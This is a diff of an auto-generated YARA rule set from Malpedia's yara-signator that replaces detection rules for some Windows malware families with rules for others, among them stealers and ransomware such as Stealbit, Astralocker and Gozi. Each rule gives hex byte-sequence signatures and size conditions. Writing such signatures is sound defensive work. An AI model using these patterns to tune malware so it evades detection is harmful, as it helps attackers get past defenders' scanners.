+		$sequence_5 = { 8b5104 668b0402 8b542404 668902 }
+		$sequence_6 = { ff15???????? 56 8bf8 ff15???????? 83c410 8bc7 }
+		$sequence_7 = { 83ec10 8bc4 89642410 50 }
+		$sequence_8 = { 57 8bf9 6a2e e8???????? }
+		$sequence_9 = { 6a0a 50 8b11 ff12 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Prestige_Auto : FILE
+rule MALPEDIA_Win_Frozenhill_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7f375cd-3d34-546f-b2e4-9c5bb038ef3e"
+		id = "67a93804-b581-5120-9731-01f5ce053d83"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.prestige_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.frozenhill"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.frozenhill_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "2346660d21873b1b5b8cefaf9e99067a1424befc1ebf82fdd47e2c270ae4e270"
+		logic_hash = "f77792066de7c23219a214fc531000b7de62e743dbb704f0fcc9770a904b8873"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123020,32 +122936,32 @@ rule MALPEDIA_Win_Prestige_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e920 e9???????? 83e920 e9???????? 83e904 e9???????? 83e93c }
-		$sequence_1 = { 0f86e4010000 85c0 7430 6bc809 8945f4 8bc3 2bc6 }
-		$sequence_2 = { e8???????? 51 68???????? 8d8dc0fcffff c645fc9f e8???????? 51 }
-		$sequence_3 = { e8???????? 51 68???????? 8d8d28fbffff c645fc8e e8???????? 51 }
-		$sequence_4 = { 0f9fc1 03ca 8b55ec 2bc2 3bc1 7ce0 6a0d }
-		$sequence_5 = { 68???????? 8d8d08faffff c645fc82 e8???????? 51 68???????? 8d8d20faffff }
-		$sequence_6 = { 8d55fc 6a0a ff7310 8d4de4 e8???????? 59 59 }
-		$sequence_7 = { 59 59 0f45fb eb6f 8845d8 8b01 8b501c }
-		$sequence_8 = { e8???????? 8bc6 c1e002 50 8b8598f8ffff 0fb70485bc534700 8d0485b84a4700 }
-		$sequence_9 = { 8bf0 8b4b2c 8b5330 3bce 7426 85d2 740f }
+		$sequence_0 = { 8be5 5d c3 1b9b0e10769b 0e 10d1 9b }
+		$sequence_1 = { ff7508 8d85c8f7ffff 50 ff15???????? 3bf4 }
+		$sequence_2 = { 8d85f4feffff 3985e8feffff 7436 8b85e8feffff 0fbe08 83f95c 7428 }
+		$sequence_3 = { 05???????? 50 e8???????? 83c404 ebda 5f 5e }
+		$sequence_4 = { f3ab a1???????? 33c5 8945fc b9???????? e8???????? 6a73 }
+		$sequence_5 = { 8bf4 8b4508 8b4808 51 8b55f8 81c2300c0000 52 }
+		$sequence_6 = { 8bf4 8d85f0fdffff 50 6804010000 ff15???????? 3bf4 }
+		$sequence_7 = { b874000000 66894586 b85c000000 66894588 b857000000 6689458a b869000000 }
+		$sequence_8 = { 5b 8b4df0 33cd e8???????? 81c480030000 }
+		$sequence_9 = { 8945fc b9???????? e8???????? c745f400000000 c745e800000000 c745dc00000000 c745d000000000 }
 
 	condition:
-		7 of them and filesize < 1518592
+		7 of them and filesize < 2652160
 }
-rule MALPEDIA_Win_Transbox_Auto : FILE
+rule MALPEDIA_Win_Astralocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "587785a3-ca04-5ed2-9e1f-d44127f3688f"
+		id = "61f3cae7-a5fe-5b6d-bea1-61609c1203ae"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.transbox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.transbox_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.astralocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.astralocker_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "5d7fecd2b9b1e3ab63215aebd667fbd9c5d2815341d593f4c4a09feacf699ae3"
+		logic_hash = "b238aeedb1c86d89326b9be21dc83bdad9113ec500a78f62720bc92f0fb68cd1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123059,32 +122975,32 @@ rule MALPEDIA_Win_Transbox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf1 8bda 57 837e1408 }
-		$sequence_1 = { 33d2 8b5d08 8955fc 8945e4 8945d8 8955e8 395104 }
-		$sequence_2 = { 8d4db8 e8???????? 8b35???????? 3b35???????? }
-		$sequence_3 = { 74e0 6a04 8d85f8fbffff 50 6a49 6a00 ff964c010000 }
-		$sequence_4 = { f7fb 56 8bf0 bbe0077e00 8bc3 2bc6 83f801 }
-		$sequence_5 = { 57 8bf1 33ff 6804010000 57 8d4610 c706???????? }
-		$sequence_6 = { 894608 85c0 74e0 6a04 8d85f8fbffff 50 6a49 }
-		$sequence_7 = { 8985d8faffff 8b8544faffff 8985dcfaffff 397e14 7204 8b16 }
-		$sequence_8 = { e8???????? 83c420 b812000000 33d2 8a900c530110 6683bc96760a000000 7506 }
-		$sequence_9 = { 8d8504e1ffff 89bd44e1ffff 50 33db 89b540e1ffff 53 }
+		$sequence_0 = { 33d2 33f6 891401 89740104 b808000000 6bc800 8b5508 }
+		$sequence_1 = { 51 8b14d0 52 e8???????? 83c408 8945f4 8955f8 }
+		$sequence_2 = { 891401 89740104 b808000000 6bc800 }
+		$sequence_3 = { 891401 89740104 b808000000 6bc800 8b5508 8b440a04 }
+		$sequence_4 = { 8955f0 ba08000000 6bf200 8b45ec }
+		$sequence_5 = { ba08000000 6bf200 8b45ec 8b55f0 b11a }
+		$sequence_6 = { 6bc80a 8b5508 33c0 33f6 89040a }
+		$sequence_7 = { 6bc20a 8b4d08 33d2 33f6 891401 89740104 }
+		$sequence_8 = { 8b5508 8b440a04 50 8b0c0a 51 e8???????? }
+		$sequence_9 = { 8b4508 8b4cd004 51 8b14d0 52 e8???????? 83c408 }
 
 	condition:
-		7 of them and filesize < 288768
+		7 of them and filesize < 191488
 }
-rule MALPEDIA_Win_Mydogs_Auto : FILE
+rule MALPEDIA_Win_Socks5_Systemz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4b817b5f-5d7c-595b-8c97-271eb59c1e4c"
+		id = "4e63ffd3-d637-54dc-963b-d590dcc87c41"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mydogs_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.socks5_systemz_auto.yar#L1-L105"
 		license_url = "N/A"
-		logic_hash = "fb82bf24d6c6bbbb3b47474367cfbe1a36e1fd31146eb3759ae00c840dc8a44d"
+		logic_hash = "9d56f402c3f1fd51548e0c2bff2c38c0e563ae0abe552efe04d2796d89f7c180"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123098,32 +123014,30 @@ rule MALPEDIA_Win_Mydogs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 88040a 8d4901 84c0 75f4 6808020000 e8???????? }
-		$sequence_1 = { 2bca 51 8d85e8fcffff 50 6a01 6a00 53 }
-		$sequence_2 = { 50 8b8544f8ffff 33c9 038d48f8ffff 83d000 50 0fb78582f9ffff }
-		$sequence_3 = { 83fe20 750f 57 6a01 6a01 68???????? e9???????? }
-		$sequence_4 = { 61 9d a1???????? f30f7e05???????? }
-		$sequence_5 = { 33d2 8945d8 b901000000 8930 }
-		$sequence_6 = { e8???????? 0fb64608 88450b 6a01 8d450b 50 8bcf }
-		$sequence_7 = { 6860ea0000 ff15???????? 68???????? 6a00 68???????? 68???????? }
-		$sequence_8 = { 69c005840808 40 894704 898560fbffff c1e818 33c6 25ff000000 }
-		$sequence_9 = { c785f0eeffff00000000 e8???????? 8bf8 83c408 85ff }
+		$sequence_0 = { 8bf1 6a4c e8???????? 8bc8 83c404 894c240c c744241800000000 }
+		$sequence_1 = { 50 ff7314 ff7310 e8???????? 8b4310 83c410 }
+		$sequence_2 = { ff10 56 8b35???????? 6a00 ffd6 50 ffd3 }
+		$sequence_3 = { 83c148 e9???????? c3 b8???????? }
+		$sequence_4 = { 8b4dec 83c134 e9???????? 8b542408 8d42e4 8b4ae0 }
+		$sequence_5 = { 8975a0 e9???????? 8b45a0 6aff }
+		$sequence_6 = { 33ed 896c2414 eb0d 50 ff15???????? 8be8 }
+		$sequence_7 = { 8d44240c 50 8d4c2414 e8???????? c744241c01000000 89742420 c74424380f000000 }
 
 	condition:
-		7 of them and filesize < 313344
+		7 of them and filesize < 1417216
 }
-rule MALPEDIA_Win_Isr_Stealer_Auto : FILE
+rule MALPEDIA_Win_Fudmodule_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f92134ff-d8ee-58cb-8cb8-468d7205306f"
+		id = "8e6e3f32-6e1c-5a24-9698-45bfa215e2d1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.isr_stealer_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fudmodule_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "75691989209029cb7a637cf5df87a857ef3ef18b6fe3194f56cba1ecab86658c"
+		logic_hash = "4035950c3484d09b89067be960d8e0c73dab8587b168d82e14a4974f9d87cb3f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123137,71 +123051,77 @@ rule MALPEDIA_Win_Isr_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fb b05e 2bc1 e8???????? 661e }
-		$sequence_1 = { 08ac22c115978d 0e e8???????? 07 }
-		$sequence_2 = { 1c8b 53 2456 2bd1 807e6543 }
-		$sequence_3 = { 46 1e 301b 15c2c8c807 d6 12d8 }
-		$sequence_4 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e e8???????? }
-		$sequence_5 = { a7 8d16 b205 07 d32cb6 08ac22c115978d }
-		$sequence_6 = { 07 fb b05e 2bc1 e8???????? }
-		$sequence_7 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e }
-		$sequence_8 = { 07 d32cb6 08ac22c115978d 0e e8???????? }
-		$sequence_9 = { e8???????? 07 fb b05e 2bc1 e8???????? 661e }
+		$sequence_0 = { 660fb3e9 53 f6dd 660fbbe2 57 }
+		$sequence_1 = { 4801e3 fec8 66c1cf03 d2e8 }
+		$sequence_2 = { 498b8c24e0090000 e8???????? 4983bc24d809000000 488bb42480000000 488b5c2478 }
+		$sequence_3 = { f9 4801e3 e9???????? 660fbec2 58 e9???????? f5 }
+		$sequence_4 = { 41ffd5 85c0 782d 488bd6 }
+		$sequence_5 = { 30db 80db4a 00eb 83c101 fec3 }
+		$sequence_6 = { e8???????? 498bcc e8???????? 8d7514 }
+		$sequence_7 = { 4963c3 488d4c2458 8b540460 4c8d440460 }
+		$sequence_8 = { 0fb6c3 f6d0 0f9cc0 58 e9???????? }
+		$sequence_9 = { 488bce e8???????? 85c0 7403 83cf08 488bce }
+		$sequence_10 = { 488d3c01 ff15???????? 488d55b0 488bc8 488d442440 }
+		$sequence_11 = { 4883c420 b37a e9???????? 0f855b73ffff 66d3fe }
+		$sequence_12 = { 488d8c246ed9e517 f5 f8 4889c3 488d3ced1b6cb3bd }
+		$sequence_13 = { 4889542420 4c8d442430 41b908000000 488bd3 488bc8 }
+		$sequence_14 = { c745b073734e6f c745b474696679 c745b8526f7574 c745bc696e6545 66c745c07800 }
+		$sequence_15 = { fecb 4889e8 b377 b301 660fa3d2 0fbae207 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 795648
 }
-rule MALPEDIA_Win_Unidentified_094_Auto : FILE
+rule MALPEDIA_Win_Lpeclient_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f5bdd8f3-d974-5222-9555-3631072a29c0"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_094"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_094_auto.yar#L1-L118"
+		id = "74413435-5011-52f6-9527-2aa5c727e8b5"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lpeclient_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "f3d0ed91e99c9ab03a6ddd24a2a28007a40b7e677077c8b725a5a67f32cc52a7"
+		logic_hash = "b5d510f66f1063fb0bc5e208227e246c4a78a2503ab8649007e1796f9f802e10"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 890d???????? 57 8915???????? a3???????? 83ceff b9???????? }
-		$sequence_1 = { 6a5c 68???????? e8???????? 83c408 33c9 }
-		$sequence_2 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? }
-		$sequence_3 = { 83c310 ff4d0c 0f857ffeffff 5f }
-		$sequence_4 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? c3 }
-		$sequence_5 = { 884dff 84d2 7902 341b }
-		$sequence_6 = { 3055fd 0fb61401 3055fe 0fb6540101 3055ff 8b55fc 89540102 }
-		$sequence_7 = { 6a00 6a00 6a00 ff15???????? c3 }
-		$sequence_8 = { 80f31b 8ad3 02d2 84db 7903 80f21b }
-		$sequence_9 = { 890d???????? 57 8915???????? a3???????? }
+		$sequence_0 = { 488d5c3e04 b8fcffffff 2bc7 8b7c2430 03f8 81ff00100000 }
+		$sequence_1 = { 488d05ddf80000 483947f0 7412 488b0f 4885c9 740a }
+		$sequence_2 = { c7450c74006900 c745106f006e00 c745143a002000 c745184b006500 c7451e70002d00 c7452241006c00 }
+		$sequence_3 = { 488d0518f90000 483bc8 741a 83b96001000000 7511 e8???????? 488b8b58010000 }
+		$sequence_4 = { 4c8d0da1fd0000 33c0 498bd1 448d4008 3b0a 742b ffc0 }
+		$sequence_5 = { 48c1e814 488d0dbfd2ffff 83e00f 339481a0a40100 }
+		$sequence_6 = { 488bcf ff15???????? 488b8c2400030000 4833cc e8???????? 488b9c2420030000 }
+		$sequence_7 = { 7508 42807c120122 7427 41ffc0 48ffc2 443bc1 }
+		$sequence_8 = { 33d2 48f7d1 83e903 85c9 7e1c 6690 42803c123a }
+		$sequence_9 = { 0f84b8010000 488d2d15e70000 41bc14030000 4c8d0528800000 488bcd 418bd4 e8???????? }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 289792
 }
-rule MALPEDIA_Win_Rockloader_Auto : FILE
+rule MALPEDIA_Win_Gozi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "104e8d35-82fc-516a-9593-bcf9bbbb834c"
+		id = "9c925d7e-4a58-58b3-a521-9431dccc113c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rockloader_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gozi_auto.yar#L1-L308"
 		license_url = "N/A"
-		logic_hash = "64906b80f87c45698d39208b0d7a3080387e28b93568b203b7e0595d5362c76c"
+		logic_hash = "d60d7415702d07d989a84ad089c91c9c930dfc0751149612c046eb9a7bf0b686"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -123215,34 +123135,56 @@ rule MALPEDIA_Win_Rockloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { dc4dec 83650800 dec9 dd5dec dd45ec dd5918 9b }
-		$sequence_1 = { 40 8a0c30 3acb 75f3 8a0c30 3acb 7413 }
-		$sequence_2 = { c3 80f961 7c0d 80f966 7f08 0fbec9 8d44c1a9 }
-		$sequence_3 = { c0e204 240f 02d0 8817 }
-		$sequence_4 = { 80383a 75b7 40 e8???????? 50 }
-		$sequence_5 = { 46 80382d 750a dd05???????? 40 dd5de4 }
-		$sequence_6 = { 7f09 0fbec9 8d44c1d0 eb24 80f941 7c0e 80f946 }
-		$sequence_7 = { 5d c20400 e8???????? 85c0 7407 c7400c05000000 c3 }
-		$sequence_8 = { 6a02 58 e8???????? 8bf8 85ff 0f84a9feffff 837d1000 }
-		$sequence_9 = { 48 746a 48 744e }
+		$sequence_0 = { 8b4dd0 03d1 8915???????? 03d9 891d???????? a3???????? }
+		$sequence_1 = { 6a00 68cee6ac00 52 50 e8???????? 898500ffffff }
+		$sequence_2 = { 50 ff7508 8d8771030000 ff10 }
+		$sequence_3 = { fb 5c 3c32 7e02 19c1 a6 3327 }
+		$sequence_4 = { c9 50 0c73 0e 96 3b5375 60 }
+		$sequence_5 = { 55 f79bfe7ca80d a7 ad b710 }
+		$sequence_6 = { 6a00 e8???????? 85c0 0f8899000000 8b45a8 }
+		$sequence_7 = { 8ee1 54 257c693a5c 48 fb 5c }
+		$sequence_8 = { e8???????? 03f0 46 ebdc ff75fc e8???????? }
+		$sequence_9 = { 6a00 6a00 6a00 8d87a2020000 ff10 }
+		$sequence_10 = { 0f8459010000 50 ff7570 ff15???????? }
+		$sequence_11 = { 50 8b35???????? ffd6 57 68???????? e8???????? }
+		$sequence_12 = { 50 68???????? 6a00 e8???????? c745ec01000000 }
+		$sequence_13 = { 8b4d18 e8???????? 8b45e0 50 }
+		$sequence_14 = { 3327 72e7 3ebb4a68d947 d93e }
+		$sequence_15 = { 3818 0f8453feffff 50 e8???????? 89463c ffb574ffffff }
+		$sequence_16 = { e8???????? ebda 8bc3 c1f805 8d3c85e00c4400 }
+		$sequence_17 = { 89950cfeffff 8b8d08feffff 0b8d0cfeffff 7431 0fc0f2 }
+		$sequence_18 = { f6c5ae 69d5e21d6c7f 0fc0f2 0fce 8af4 }
+		$sequence_19 = { ffb5acfeffff e8???????? 8bd8 039dacfeffff ff7510 53 }
+		$sequence_20 = { dc6f1b 95 bf633629a8 02738f 1da2c9dde2 }
+		$sequence_21 = { 84e5 0fce 0fbef4 69f116814003 0faceaca c0d6f6 }
+		$sequence_22 = { 8b440704 8945a4 50 e8???????? 8b4648 8b7c0708 897da0 }
+		$sequence_23 = { 68???????? ffb5bcfdffff ff15???????? 897dfc e8???????? 8d85c0fdffff 50 }
+		$sequence_24 = { 03c7 03cf 83ff1f 0f87a4030000 ff24bd95244300 }
+		$sequence_25 = { e8???????? 83f8ff 7442 8985fcfeffff 68???????? e8???????? }
+		$sequence_26 = { 8ad0 4a 8ad0 84c1 }
+		$sequence_27 = { 6af4 dbe9 68912b4384 2383e08985e4 0572b6e2f4 fd }
+		$sequence_28 = { 128b42926614 12a502b346d1 41 b87e8da638 e022 }
+		$sequence_29 = { 68???????? ff75c0 ff15???????? 834dfcff e8???????? ff7508 8d45c4 }
+		$sequence_30 = { 0f848ffbffff 50 8b4658 8d443804 50 e8???????? 898574ffffff }
+		$sequence_31 = { 5b 5f c9 c21400 8d87eb040000 8b00 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 568320
 }
-rule MALPEDIA_Win_Blister_Auto : FILE
+rule MALPEDIA_Win_Ironhalo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fe50a609-9d69-50d8-9407-cc1bb662c99e"
+		id = "5d173d13-7e7f-5038-a17a-f1673b379630"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blister"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blister_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ironhalo_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "bbff3501a1abd67d694ed63bda3afb810ae6150a68deb6d717b382978b46ad0d"
-		score = 60
-		quality = 25
+		logic_hash = "b28c071e016d2fd6c8035d945d059b7edc886edf229a30a1e4641350946cb806"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -123254,32 +123196,32 @@ rule MALPEDIA_Win_Blister_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 8b5d10 56 8b750c 57 33ff 6a02 }
-		$sequence_1 = { 50 c745c03c000000 c745c400020000 c745cce4301717 c745dc05000000 ff15???????? }
-		$sequence_2 = { 7507 bf0e000780 eb34 8365f400 ff750c 33c0 }
-		$sequence_3 = { 7d06 33c0 33ff eb03 8b45f4 8945fc }
-		$sequence_4 = { 50 8d8584fcffff 50 ffb580fcffff 8d856cfcffff ffb578fcffff 50 }
-		$sequence_5 = { ff32 ff15???????? 83f8ff 7507 b805400080 eb02 33c0 }
-		$sequence_6 = { ff7508 6813100000 ff36 ffd7 6a03 58 8945d4 }
-		$sequence_7 = { e8???????? 57 8bce 894508 e8???????? 5f 5e }
-		$sequence_8 = { 85f6 7507 b857000780 eb45 832600 6a38 8d45c8 }
-		$sequence_9 = { e8???????? 8bce e8???????? 8bd8 85db 7d0f }
+		$sequence_0 = { 8a800c914000 83e00f eb02 33c0 }
+		$sequence_1 = { 8bcb c1f805 83e11f 8b048560e04000 f644c80401 0f84f9000000 6a01 }
+		$sequence_2 = { 6a00 56 e8???????? 56 e8???????? 8be8 83c410 }
+		$sequence_3 = { ffd6 8d542410 8d442424 52 50 ffd6 8d4c2424 }
+		$sequence_4 = { ffd7 8d742428 bb03000000 8d442438 }
+		$sequence_5 = { 243f c0e206 0ac2 83c104 88042f 45 803c3100 }
+		$sequence_6 = { 743a 0fb6d0 f68221cf400004 741a }
+		$sequence_7 = { 50 ffd7 8d742428 bb03000000 8d4c2438 8d542410 }
+		$sequence_8 = { 52 668954241c e8???????? 50 e8???????? 83c408 8d442410 }
+		$sequence_9 = { 6a00 6a50 50 56 ff15???????? 8be8 }
 
 	condition:
-		7 of them and filesize < 1822720
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Zebrocy_Auto : FILE
+rule MALPEDIA_Win_Stealbit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a5288975-5a36-5a4a-9025-084c7ee804a2"
+		id = "5dce69d0-a61c-561d-bb3f-783619cef52d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zebrocy_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stealbit_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "31a3a19dc89466809ccbf56c8c805a07b997358dbb942052f14c84a36be45691"
+		logic_hash = "90bb65634be35c442101bb71a7db5f26606dba88a1c52cacba38d15f6d5908ea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123293,38 +123235,32 @@ rule MALPEDIA_Win_Zebrocy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c605????????03 c705????????04000000 c605????????11 c705????????00000000 }
-		$sequence_1 = { e8???????? 84c0 8b4de0 7507 }
-		$sequence_2 = { 50 8d45f4 64a300000000 6aff 33ff c745fc01000000 }
-		$sequence_3 = { 8be5 5d c21000 8b4d14 51 56 }
-		$sequence_4 = { e8???????? 83c41c 83ec1c 8bcc 89a5f4f4ffff }
-		$sequence_5 = { ff25???????? ebb5 55 b9???????? 89e5 }
-		$sequence_6 = { f2ae 89c8 f7d0 8d5402ff }
-		$sequence_7 = { 8bd8 3bc7 7e63 8d642400 6a02 }
-		$sequence_8 = { 397de0 7f57 8b03 85c0 }
-		$sequence_9 = { 8d45f4 64a300000000 33db 897d90 895d94 6aff c745fc01000000 }
-		$sequence_10 = { 89d8 e8???????? 8d9510fcffff 89c6 8d8500fcffff 89d7 }
-		$sequence_11 = { 89c7 eb2f 89f2 89d9 e8???????? }
-		$sequence_12 = { 325032 7032 7c32 9c 32a432ac32c432 d432 e8???????? }
-		$sequence_13 = { 33c0 894e14 894710 894714 c645fc00 837de810 720c }
-		$sequence_14 = { 66c705????????6046 8915???????? ba???????? a3???????? e8???????? }
-		$sequence_15 = { 89b5c4f7ffff 899dc0f7ffff 889db0f7ffff 39bd38f7ffff }
+		$sequence_0 = { 66899528feffff 6689bd30feffff 66899d38feffff 6689bd3efeffff 6689bd42feffff 66894dbc 66895dc0 }
+		$sequence_1 = { 0f8544010000 6a07 5b 53 8d45bc 8bd6 }
+		$sequence_2 = { 8bc2 5d c20400 8bd1 8b0a e8???????? 8bc8 }
+		$sequence_3 = { 8d47f1 c745f877caeb85 03c3 bf28442324 8365fc00 be4f86c861 }
+		$sequence_4 = { 2ac8 8ac1 5d c20400 55 8bec }
+		$sequence_5 = { 88460d 57 886e0e 884e0f 6a25 885610 e8???????? }
+		$sequence_6 = { 8b450c 48 83e801 740e 83e801 750f 8b4508 }
+		$sequence_7 = { 33c0 66898518ffffff 58 6a74 66898506ffffff 6689b540ffffff }
+		$sequence_8 = { 8945f8 e8???????? 03c0 8bce 8bd0 e8???????? 6a0c }
+		$sequence_9 = { 6a20 66899524ffffff 6689952effffff 5a 6a6e 58 6a6d }
 
 	condition:
-		7 of them and filesize < 393216
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Elise_Auto : FILE
+rule MALPEDIA_Win_Radamant_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "08b1c424-ccca-5509-994b-c3215e83e8dc"
+		id = "c9054a5c-bb68-56d9-b004-7795b422035b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.elise_auto.yar#L1-L199"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.radamant_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "70b08762b10b71d08f89704ff70572a2b0da8c94488cb175a27749246468d125"
+		logic_hash = "c8bbb0af31c01f18c5c289ae1834ad1b53dc2920970c2b6e405a5699e0104750"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123338,42 +123274,32 @@ rule MALPEDIA_Win_Elise_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 1bc0 83e0fe 83c00b 8945f8 8b45f4 40 50 }
